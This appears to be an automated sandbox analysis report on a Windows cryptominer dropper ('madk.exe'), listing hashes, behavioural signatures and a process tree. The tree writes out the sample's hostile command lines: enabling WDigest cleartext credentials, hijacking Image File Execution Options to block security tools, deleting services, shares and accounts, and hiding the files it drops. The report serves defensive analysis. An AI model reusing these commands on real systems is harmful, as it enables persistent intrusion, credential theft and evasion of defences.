Analysis
-
max time kernel
150s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
21-06-2022 21:54
Static task
static1
Behavioral task
behavioral1
Sample
madk.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
madk.exe
Resource
win10v2004-20220414-en
General
-
Target
madk.exe
-
Size
3.4MB
-
MD5
d00af5991807952929e5b986afd295c9
-
SHA1
7f5cc8203f2e22bea24bf7f7b2995dc2ef3571ee
-
SHA256
025e8edef965f9376d6a0387c3f2952c19e727629920aeea544d963ee89b1594
-
SHA512
c032eec4bbb1a34113ea86606ae3b1c5d94a7f6f7d52d3347341312d4bf3af2dfa730d549b612a37353a21274eae8f10960ad105fc52c4955c33cccf5f0c1cd6
Malware Config
Signatures
-
Clears Windows event logs 1 TTPs 3 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exepid process 1252 wevtutil.exe 352 wevtutil.exe 3696 wevtutil.exe -
Detected Stratum cryptominer command 2 IoCs
Looks to be attempting to contact Stratum mining pool.
Processes:
rundlls.exesvchost.exepid process 3076 rundlls.exe 740 svchost.exe -
XMRig Miner Payload 4 IoCs
Processes:
resource yara_rule behavioral2/memory/2164-189-0x0000000000400000-0x0000000000DEF000-memory.dmp xmrig C:\Windows\Fonts\rundlls.exe xmrig \??\c:\windows\Fonts\rundlls.exe xmrig behavioral2/memory/2164-233-0x0000000000400000-0x0000000000DEF000-memory.dmp xmrig -
Executes dropped EXE 13 IoCs
Processes:
svchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.execonhost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exerundlls.exepid process 3312 svchost.exe 1548 svchost.exe 2604 svchost.exe 3104 svchost.exe 2020 svchost.exe 1108 svchost.exe 2164 conhost.exe 740 svchost.exe 2520 svchost.exe 4324 svchost.exe 1504 svchost.exe 1936 svchost.exe 3076 rundlls.exe -
Sets file execution options in registry 2 TTPs 20 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe\debugger = "taskkill.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe\deebugger = "taskkill.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\debugger = "taskkill.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe\debugger = "taskkill.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe\debugger = "taskkill.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe\deebugger = "taskkill.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe\debugger = "C:\\\\WINDOWS\\\\system32\\\\svchost.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe\debugger = "taskkill.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\debugger = "taskkill.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe\debugger = "taskkill.exe" reg.exe -
Sets file to hidden 1 TTPs 5 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 2016 attrib.exe 4916 attrib.exe 1772 attrib.exe 3296 attrib.exe 2860 attrib.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral2/memory/3744-130-0x0000000000400000-0x0000000000809000-memory.dmp upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx \??\c:\windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx behavioral2/memory/3312-170-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/1548-171-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/3104-173-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/2604-172-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/3104-176-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/2020-175-0x0000000140000000-0x0000000140053000-memory.dmp upx C:\Windows\Fonts\svchost.exe upx behavioral2/memory/1108-180-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/3744-182-0x0000000000400000-0x0000000000809000-memory.dmp upx C:\Windows\Fonts\conhost.exe upx \??\c:\windows\Fonts\conhost.exe upx behavioral2/memory/2020-187-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/2164-189-0x0000000000400000-0x0000000000DEF000-memory.dmp upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx behavioral2/memory/740-215-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/2520-216-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/4324-218-0x0000000140000000-0x0000000140053000-memory.dmp upx C:\Windows\Fonts\svchost.exe upx behavioral2/memory/1936-227-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/1504-228-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/1504-229-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/1548-231-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/1108-232-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/2164-233-0x0000000000400000-0x0000000000DEF000-memory.dmp upx behavioral2/memory/1936-234-0x0000000140000000-0x0000000140053000-memory.dmp upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
madk.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation madk.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exetakeown.exetakeown.exetakeown.exepid process 4572 takeown.exe 3976 takeown.exe 1044 takeown.exe 4048 takeown.exe -
Drops file in Windows directory 64 IoCs
Processes:
madk.execonhost.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exedescription ioc process File created \??\c:\windows\Fonts\svchost.exe madk.exe File opened for modification \??\c:\windows\Fonts\rundlls.exe conhost.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\lsass.exe attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification \??\c:\windows\Fonts\svchost.exe conhost.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File created \??\c:\windows\Fonts\rundlls.exe conhost.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File created \??\c:\windows\Fonts\WinRing0x64.sys madk.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe -
Launches sc.exe 23 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1332 sc.exe 5000 sc.exe 2524 sc.exe 2248 sc.exe 2576 sc.exe 4616 sc.exe 3216 sc.exe 4664 sc.exe 1944 sc.exe 1964 sc.exe 4584 sc.exe 980 sc.exe 4340 sc.exe 1140 sc.exe 1956 sc.exe 5108 sc.exe 2516 sc.exe 308 sc.exe 4720 sc.exe 3264 sc.exe 2136 sc.exe 1964 sc.exe 2524 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with WMI 4 IoCs
Processes:
WMIC.exeWMIC.exeWMIC.exeWMIC.exepid process 4188 WMIC.exe 2340 WMIC.exe 2300 WMIC.exe 2536 WMIC.exe -
Kills process with taskkill 14 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1744 taskkill.exe 4028 taskkill.exe 1676 taskkill.exe 1748 taskkill.exe 3156 taskkill.exe 5108 taskkill.exe 1196 taskkill.exe 4920 taskkill.exe 3964 taskkill.exe 3880 taskkill.exe 3404 taskkill.exe 2324 taskkill.exe 1340 taskkill.exe 4440 taskkill.exe -
Modifies registry class 1 IoCs
Processes:
madk.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings madk.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
conhost.exepid process 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe 2164 conhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 636 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exerundlls.exeWMIC.exeWMIC.exedescription pid process Token: SeDebugPrivilege 4028 taskkill.exe Token: SeDebugPrivilege 3404 taskkill.exe Token: SeDebugPrivilege 3880 taskkill.exe Token: SeDebugPrivilege 2324 taskkill.exe Token: SeDebugPrivilege 1676 taskkill.exe Token: SeDebugPrivilege 1340 taskkill.exe Token: SeDebugPrivilege 1748 taskkill.exe Token: SeDebugPrivilege 4440 taskkill.exe Token: SeDebugPrivilege 1744 taskkill.exe Token: SeLockMemoryPrivilege 3076 rundlls.exe Token: SeIncreaseQuotaPrivilege 2340 WMIC.exe Token: SeSecurityPrivilege 2340 WMIC.exe Token: SeTakeOwnershipPrivilege 2340 WMIC.exe Token: SeLoadDriverPrivilege 2340 WMIC.exe Token: SeSystemProfilePrivilege 2340 WMIC.exe Token: SeSystemtimePrivilege 2340 WMIC.exe Token: SeProfSingleProcessPrivilege 2340 WMIC.exe Token: SeIncBasePriorityPrivilege 2340 WMIC.exe Token: SeCreatePagefilePrivilege 2340 WMIC.exe Token: SeBackupPrivilege 2340 WMIC.exe Token: SeRestorePrivilege 2340 WMIC.exe Token: SeShutdownPrivilege 2340 WMIC.exe Token: SeDebugPrivilege 2340 WMIC.exe Token: SeSystemEnvironmentPrivilege 2340 WMIC.exe Token: SeRemoteShutdownPrivilege 2340 WMIC.exe Token: SeUndockPrivilege 2340 WMIC.exe Token: SeManageVolumePrivilege 2340 WMIC.exe Token: 33 2340 WMIC.exe Token: 34 2340 WMIC.exe Token: 35 2340 WMIC.exe Token: 36 2340 WMIC.exe Token: SeIncreaseQuotaPrivilege 2340 WMIC.exe Token: SeSecurityPrivilege 2340 WMIC.exe Token: SeTakeOwnershipPrivilege 2340 WMIC.exe Token: SeLoadDriverPrivilege 2340 WMIC.exe Token: SeSystemProfilePrivilege 2340 WMIC.exe Token: SeSystemtimePrivilege 2340 WMIC.exe Token: SeProfSingleProcessPrivilege 2340 WMIC.exe Token: SeIncBasePriorityPrivilege 2340 WMIC.exe Token: SeCreatePagefilePrivilege 2340 WMIC.exe Token: SeBackupPrivilege 2340 WMIC.exe Token: SeRestorePrivilege 2340 WMIC.exe Token: SeShutdownPrivilege 2340 WMIC.exe Token: SeDebugPrivilege 2340 WMIC.exe Token: SeSystemEnvironmentPrivilege 2340 WMIC.exe Token: SeRemoteShutdownPrivilege 2340 WMIC.exe Token: SeUndockPrivilege 2340 WMIC.exe Token: SeManageVolumePrivilege 2340 WMIC.exe Token: 33 2340 WMIC.exe Token: 34 2340 WMIC.exe Token: 35 2340 WMIC.exe Token: 36 2340 WMIC.exe Token: SeIncreaseQuotaPrivilege 2300 WMIC.exe Token: SeSecurityPrivilege 2300 WMIC.exe Token: SeTakeOwnershipPrivilege 2300 WMIC.exe Token: SeLoadDriverPrivilege 2300 WMIC.exe Token: SeSystemProfilePrivilege 2300 WMIC.exe Token: SeSystemtimePrivilege 2300 WMIC.exe Token: SeProfSingleProcessPrivilege 2300 WMIC.exe Token: SeIncBasePriorityPrivilege 2300 WMIC.exe Token: SeCreatePagefilePrivilege 2300 WMIC.exe Token: SeBackupPrivilege 2300 WMIC.exe Token: SeRestorePrivilege 2300 WMIC.exe Token: SeShutdownPrivilege 2300 WMIC.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
rundlls.exepid process 3076 rundlls.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
madk.execonhost.exepid process 3744 madk.exe 3744 madk.exe 2164 conhost.exe 2164 conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
madk.exedescription pid process target process PID 3744 wrote to memory of 4284 3744 madk.exe cmd.exe PID 3744 wrote to memory of 4284 3744 madk.exe cmd.exe PID 3744 wrote to memory of 4284 3744 madk.exe cmd.exe PID 3744 wrote to memory of 4224 3744 madk.exe reg.exe PID 3744 wrote to memory of 4224 3744 madk.exe reg.exe PID 3744 wrote to memory of 4224 3744 madk.exe reg.exe PID 3744 wrote to memory of 4268 3744 madk.exe reg.exe PID 3744 wrote to memory of 4268 3744 madk.exe reg.exe PID 3744 wrote to memory of 4268 3744 madk.exe reg.exe PID 3744 wrote to memory of 4184 3744 madk.exe reg.exe PID 3744 wrote to memory of 4184 3744 madk.exe reg.exe PID 3744 wrote to memory of 4184 3744 madk.exe reg.exe PID 3744 wrote to memory of 4768 3744 madk.exe reg.exe PID 3744 wrote to memory of 4768 3744 madk.exe reg.exe PID 3744 wrote to memory of 4768 3744 madk.exe reg.exe PID 3744 wrote to memory of 4172 3744 madk.exe reg.exe PID 3744 wrote to memory of 4172 3744 madk.exe reg.exe PID 3744 wrote to memory of 4172 3744 madk.exe reg.exe PID 3744 wrote to memory of 4664 3744 madk.exe sc.exe PID 3744 wrote to memory of 4664 3744 madk.exe sc.exe PID 3744 wrote to memory of 4664 3744 madk.exe sc.exe PID 3744 wrote to memory of 4720 3744 madk.exe sc.exe PID 3744 wrote to memory of 4720 3744 madk.exe sc.exe PID 3744 wrote to memory of 4720 3744 madk.exe sc.exe PID 3744 wrote to memory of 3264 3744 madk.exe sc.exe PID 3744 wrote to memory of 3264 3744 madk.exe sc.exe PID 3744 wrote to memory of 3264 3744 madk.exe sc.exe PID 3744 wrote to memory of 2136 3744 madk.exe sc.exe PID 3744 wrote to memory of 2136 3744 madk.exe sc.exe PID 3744 wrote to memory of 2136 3744 madk.exe sc.exe PID 3744 wrote to memory of 2524 3744 madk.exe sc.exe PID 3744 wrote to memory of 2524 3744 madk.exe sc.exe PID 3744 wrote to memory of 2524 3744 madk.exe sc.exe PID 3744 wrote to memory of 2248 3744 madk.exe sc.exe PID 3744 wrote to memory of 2248 3744 madk.exe sc.exe PID 3744 wrote to memory of 2248 3744 madk.exe sc.exe PID 3744 wrote to memory of 1964 3744 madk.exe sc.exe PID 3744 wrote to memory of 1964 3744 madk.exe sc.exe PID 3744 wrote to memory of 1964 3744 madk.exe sc.exe PID 3744 wrote to memory of 4584 3744 madk.exe sc.exe PID 3744 wrote to memory of 4584 3744 madk.exe sc.exe PID 3744 wrote to memory of 4584 3744 madk.exe sc.exe PID 3744 wrote to memory of 4028 3744 madk.exe taskkill.exe PID 3744 wrote to memory of 4028 3744 madk.exe taskkill.exe PID 3744 wrote to memory of 4028 3744 madk.exe taskkill.exe PID 3744 wrote to memory of 3404 3744 madk.exe taskkill.exe PID 3744 wrote to memory of 3404 3744 madk.exe taskkill.exe PID 3744 wrote to memory of 3404 3744 madk.exe taskkill.exe PID 3744 wrote to memory of 3880 3744 madk.exe taskkill.exe PID 3744 wrote to memory of 3880 3744 madk.exe taskkill.exe PID 3744 wrote to memory of 3880 3744 madk.exe taskkill.exe PID 3744 wrote to memory of 5084 3744 madk.exe net.exe PID 3744 wrote to memory of 5084 3744 madk.exe net.exe PID 3744 wrote to memory of 5084 3744 madk.exe net.exe PID 3744 wrote to memory of 4088 3744 madk.exe net1.exe PID 3744 wrote to memory of 4088 3744 madk.exe net1.exe PID 3744 wrote to memory of 4088 3744 madk.exe net1.exe PID 3744 wrote to memory of 1272 3744 madk.exe net.exe PID 3744 wrote to memory of 1272 3744 madk.exe net.exe PID 3744 wrote to memory of 1272 3744 madk.exe net.exe PID 3744 wrote to memory of 1944 3744 madk.exe sc.exe PID 3744 wrote to memory of 1944 3744 madk.exe sc.exe PID 3744 wrote to memory of 1944 3744 madk.exe sc.exe PID 3744 wrote to memory of 3940 3744 madk.exe net.exe -
Views/modifies file attributes 1 TTPs 64 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 1904 attrib.exe 1524 attrib.exe 1588 attrib.exe 3728 attrib.exe 2520 attrib.exe 4648 attrib.exe 4260 attrib.exe 4988 attrib.exe 5084 attrib.exe 1628 attrib.exe 2212 attrib.exe 3992 attrib.exe 1932 attrib.exe 1140 attrib.exe 2348 attrib.exe 908 attrib.exe 656 attrib.exe 4344 attrib.exe 2056 attrib.exe 4292 attrib.exe 412 attrib.exe 1192 attrib.exe 2944 attrib.exe 1744 attrib.exe 4324 attrib.exe 304 attrib.exe 1956 attrib.exe 1772 attrib.exe 784 attrib.exe 2528 attrib.exe 4572 attrib.exe 2016 attrib.exe 4728 attrib.exe 3704 attrib.exe 4372 attrib.exe 1872 attrib.exe 1096 attrib.exe 4596 attrib.exe 4352 attrib.exe 4976 attrib.exe 2528 attrib.exe 3192 attrib.exe 2556 attrib.exe 4592 attrib.exe 2760 attrib.exe 3968 attrib.exe 4048 attrib.exe 3400 attrib.exe 2144 attrib.exe 1640 attrib.exe 3152 attrib.exe 1552 attrib.exe 4916 attrib.exe 3992 attrib.exe 2008 attrib.exe 2944 attrib.exe 2268 attrib.exe 3408 attrib.exe 3700 attrib.exe 4312 attrib.exe 1196 attrib.exe 3152 attrib.exe 4480 attrib.exe 4200 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\madk.exe"C:\Users\Admin\AppData\Local\Temp\madk.exe"1⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts3⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe" /v "deebugger" /d taskkill.exe /f2⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe" /f2⤵
-
C:\Windows\SysWOW64\sc.exesc delete MetPipAtcivator2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop SetPipAtcivator2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop MicrosotMaims2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete SetPipAtcivator2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop MetPipAtcivator2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete MicrosotMaims2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop MicrosotMais2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete MicrosotMais2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im dl1hots.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im rundlls.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\net1.exenet1 user mm123$ /del2⤵
-
C:\Windows\SysWOW64\net.exenet stop mssecsvc2.02⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssecsvc2.03⤵
-
C:\Windows\SysWOW64\net.exenet user mm123$ /del2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user mm123$ /del3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im d1lhots.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe" /v "deebugger" /d taskkill.exe /f2⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\sc.exesc delete mssecsvc2.02⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\net.exenet stop mssecsvc2.12⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssecsvc2.13⤵
-
C:\Windows\SysWOW64\sc.exesc delete mssecsvc2.12⤵
- Launches sc.exe
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe install MetPipAtcivator c:\windows\Fonts\conhost.exe2⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set MetPipAtcivator Description Provides performance library information from Windows Management.2⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe start MetPipAtcivator2⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe start MetPipAtcivator2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\TEMP\csonhost.bat2⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f3⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.1 -n 53⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\sc.exesc start MetPipAtcivator3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc start MetPipAtcivator3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\net.exenet share iPC$ /delete3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share iPC$ /delete4⤵
-
C:\Windows\SysWOW64\net.exenet share admin$ /delete3⤵
-
